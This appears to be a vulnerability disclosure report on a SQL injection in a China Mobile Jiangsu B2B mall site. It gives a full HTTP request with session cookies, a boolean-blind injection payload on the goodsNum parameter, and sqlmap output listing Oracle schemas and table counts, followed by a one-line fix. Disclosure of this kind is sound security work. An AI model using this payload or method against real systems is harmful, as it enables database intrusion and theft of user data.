A provincial website of China Mobile 10086.cn SQL injection involves a large amount of data.
A provincial website of China Mobile 10086.cn SQL injection involves a large amount of data.
Injection of Jiangsu mobile B2B Mall, oracle database, can be run directly with sqlmap
POST /b2b/actionDispatcher.do HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://**.**.**.**/b2b/goods/UUPO-U8.jspContent-Length: 88Cookie: bi-user-id=141309163362895; WT_FPC=id=2e40e16cec67a0884481414484686765:lv=1448563543832:ss=1448563522116; tK1gTQFA2C=MDAwM2IyYThiNjAwMDAwMDAwNjQwQXgvWR0xNDQ4NTM1ODk0; B2B_JSESSIONID=qqrCWW2hTSZvSpZydDDTS1GBYbpr1GN1Sn0h9gT01GR1ndY1vjcB!382508210; __utma=231257732.265260302.1448563524.1448563524.1448563524.1; __utmb=231257**.**.**.**8563524; __utmc=231257732; __utmz=231257732.1448563524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; fpyUjfj0NP=MDAwM2IyYThiNjAwMDAwMDAwMzIwVC9ACVkxNDQ4NTM1OTEzConnection: keep-alivePragma: no-cacheCache-Control: no-cachereqUrl=goodsDetailPrice&goodsNum=JSYD-LENOVO-A278T-01&supplierNum=99100012
GoodsNum injection exists.
Poc:
GoodsNum = JSYD-LENOVO-A278T-01 ') AND 1363 = 1363 AND ('1' = '1
Sqlmap identified the following injection points with a total of 0 HTTP (s) requests:
---
Place: POST
Parameter: goodsNum
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: reqUrl = goodsDetailPrice & goodsNum = JSYD-LENOVO-A278T-01 ') AND 1517 = 1517 AND ('cknd' = 'cknd & supplierNum = 99100012
---
[02:49:10] [INFO] the back-end DBMS is Oracle
Web application technology: Servlet 3.0, JSP 2.2, Nginx
Back-end DBMS: Oracle
[02:49:10] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[02:49:10] [INFO] fetching database (schema) names
[02:49:10] [INFO] fetching number of databases
[02:49:10] [INFO] resumed: 4
[02:49:10] [INFO] resumed: KFZXBTB
[02:49:10] [INFO] resumed: SYS
[02:49:10] [INFO] resumed: SYSTEM
[02:49:10] [INFO] resumed: TSMS1
Available databases [4]:
[*] KFZXBTB
[*] SYS
[*] SYSTEM
[*] TSMS1
There are 659 tables in the current database and 8 tables involving the password field
Web application technology: Servlet 3.0, JSP 2.2, Nginx
Back-end DBMS: Oracle
[03:02:38] [INFO] fetching tables for database: 'fzxbtb'
[03:02:38] [INFO] fetching number of tables for database 'kfzxbtb'
[03:02:38] [INFO] retrieved: 659
Solution:
Filtering and parameterization